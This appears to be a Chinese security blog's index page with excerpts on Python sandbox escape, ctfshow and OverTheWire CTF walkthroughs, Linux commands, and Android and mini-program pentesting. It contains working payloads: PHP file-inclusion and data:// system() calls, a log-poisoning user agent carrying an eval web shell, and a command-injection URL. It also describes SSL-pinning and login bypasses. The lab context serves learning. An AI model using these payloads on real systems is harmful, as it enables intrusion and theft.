python沙箱逃逸
概念Python 沙箱是一个受限制的执行环境,允许您运行不受信任的 Python 代码,同时限制其访问系统资源和执行危险操作。Python 沙箱通常用于以下情况:
在网络应用程序中运行用户提交的代码,以防止恶意代码执行。
在测试和调试期间,隔离和检查不受信任的代码,以确保其不会破坏系统。
在某些自动化任务中,限制脚本的行为,以防止不必要的风险。
python沙箱逃逸简称pyjail,就是用来逃脱python固定环境,执行系统命令的方法
使用场景
使用 exec 或 eval Python 提供了内置的 exec 和 eval 函数,允许动态执行代码。可以在运行时将代码传递给这些函数,并在受控环境中执行它们。然而,要注意,exec 和 eval 本身不提供沙箱保护措施,因此需要谨慎使用。12code = "print('Hello, World!')"exec(code)
使用模块级别的沙箱 一种常见的做法是使用模块级别的沙箱,例如 restrictedpython 和 PyExecJS。这些工具可以在独立的执行环境中运行 Python 代码,并限 ...
ctfshow文件包含漏洞
第78题-第83题第78题直接file=php://filter/read=convert.base64-encode/resource=flag.php,然后命令行解密
或者使用data伪协议
第79题可以使用短标签绕过file=data://text/plain,<?=system('tac flag.php');?>
或者base64编码一下也可以
第80题日志投毒,没啥好说的ua改成Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0<?php @eval($_POST['cmd']); ?>
payload改成?file=/var/log/nginx/access.log&2=phpinfo();
结束
最后我结合蚁剑
第81题
依旧日志包含
第82题
ctfshow命令执行漏洞
第29关-第34关第29关123456789101112131415161718192021<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:26:48 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); ...
linux编码与解码
其实Linux自带一套简易的编码与解码方案,可以快速帮我们解决题目
Linux常见的编码解码命令Base64 编码与解码Base64 是数据传输和隐藏中最常见的方式。
编码: 将字符串或文件转换为 Base64 格式。
123echo -n "Hello World" | base64# 或者对文件进行编码base64 filename.txt
_(注意:`echo -n` 用于消除自动添加的换行符,这在精确解题时非常关键)_
解码: 使用 -d (decode) 参数。
1echo "SGVsbG8gV29ybGQ=" | base64 -d
Hex (十六进制) 与 ASCII 转换在分析二进制文件或处理底层数据时,十六进制转换必不可少。xxd 是最得力的工具。
字符串转 Hex (编码): 使用 -p (plain) 输出纯十六进制字符串。
1echo -n "flag{test}" | xxd -p
Hex 转字符串 (解码): 使用 -r (revert) 参数还原。
1echo ...
overthewire natas靶场
第0关在html代码中,右击获取就行
第1关禁右键了,加上vview--soource
第2关这里,说明files下有路径,查看可得
第3关还是信息泄露在 Web 开发中,如果你想告诉搜索引擎的爬虫(比如 Googlebot)不要去抓取网站的某些特定目录或文件,通常会在网站的根目录下放置一个特殊的文件。
第4关referer伪造
第5关cookie伪造
第6关
第7关路径穿越
第8关
这里是先对密码进行base64加密,然后反转,最后转hex,所以
第9关命令执行漏洞http://natas9.natas.labs.overthewire.org/index.php?needle=%3B+cat%20/etc/natas_webpass/natas10+%22%22+%3B&submit=Search
第10关
这里其实还考察了php grep的多文件扫描机制
grep -i .* /etc/natas_webpass/natas11 dictionary.txt这样一来,grep 就把这段命令解析成了:
要搜索的内容: .* (正则表达式,代表匹配任意字符)
搜索目 ...
overthewire Bandit靶场
xrh推荐的基础靶场,来玩一玩
第0关挺简单的,不说了
第1关
这里有linux的特殊符号’-‘号
这种情况下直接cta ./-
第2关--spaces in this filename--文件,加了空格
之前./就不行了,会被终端识别为多个文件,只能cat ./"--spaces in this filename--"
第3关
第4关
需要使用file查看文本文件
正常输出即可
第5关有提示1find . -type f -size 1033c
然后1cat "./maybehere07/.file2"
第6关
其中2>/dev/null是说错误输出就不弹出
第7关
第8关
第9关1strings data.txt
strings命令,用于查看文件可识别字符串
第10关
第11关考凯撒密码
第12关考解压缩就是一直解压-file-解压到最后就行
第13关考察ssh命令
这里说了本地无法连接,必须退到本地连接看看私钥文件
创建好文件后用ssh连接就行,注意如果报错的话应该是权限问题,改一下权限就好了
第14关
第15关使用ssl连接
1op ...
linux特殊字符
路径、系统目录与注释# (井号)注释屏蔽位于行首或命令后(需有空格分隔),其后内容仅作说明,不被执行。
1234567# 这是一个单行注释,整行都不会被执行echo "Hello, World!" ls -l # 这是一个行尾注释,仅注释掉 # 后面的内容# 注意:如果 # 被引号包裹,它就失去了注释的作用,变成了普通字符echo "My favorite hashtag is #Linux"
解释器声明位于脚本绝对的第一行,内核会根据它来决定使用哪个解释器来执行该脚本。
123456#!/bin/bash# 明确指定使用 /bin/bash 来执行脚本# 或者使用更具可移植性的写法(推荐):#!/usr/bin/env python3# 去系统环境变量中寻找 python3 解释器来执行
计算变量/数组的长度在变量替换中,# 可以用来获取字符串的字符数量,或者数组的元素个数。
12345my_str="Hello"echo "字符串长度为: ${#my_str}" # 输出: 5 ...
安卓渗透
安卓渗透资产提取在安卓应用的信息收集阶段,资产提取的核心目标是获取应用后端的API接口、云存储配置、硬编码的敏感信息(如AK/SK、密码等)以及其他潜在的攻击面。
抓包提取网络资产 (动态流量分析)通过配置网络代理,拦截应用与服务器之间的通信流量,提取动态交互中的实际请求URL、内网IP、接口路径和参数结构。
常用工具: Burp Suite, Charles, Fiddler, HTTP Toolkit。
核心操作要点:
基础抓包: 在测试机(手机/模拟器)上配置WiFi代理,并安装抓包工具的CA证书。
突破证书校验 (SSL Pinning): 现代APP普遍会校验证书,导致HTTPS流量显示未知或抓取失败。
解决方案: 需要配合 Root 环境 + Xposed/LSPosed 框架,使用 JustTrustMe 或 TrustMeAlready 模块;或者使用 Frida 配合绕过脚本(如 frida-multiple-unpinning)。
防代理绕过 (VPN抓包): 部分APP会检测系统代理并拒绝发送请求,或不走系统代理。
解决方案:使用 Postern 或 Pro ...
小程序渗透
抓包小程序作为高频业务入口,常因接口鉴权缺失、弱口令泛滥、Swagger 文档泄露等问题暗藏安全隐患。本文结合真实渗透案例,梳理小程序 Web 接口速通技巧,从弱口令登录突破、模糊查询信息泄露,到参数越权、未授权访问挖掘,再到小程序 Token 复用绕过 Web 后台鉴权,完整拆解常见登录绕过与漏洞利用思路,为攻防实战提供可复用的挖掘方法与实操路径。
系统抓包系统抓包会受系统影响
安卓7.0 以下,不管微信什么版本,都会信任系统证书
安卓7.0以上,微信7.0以下,微信会信任系统证书
安卓7.0以上,微信7.0以上,微信只信任它自己配置的系统证书
基于上述,解决方法如下:
将证书安装在系统证书中
苹果手机
采用安卓7.0以下的证书
反编译脱壳
自动查壳脱壳






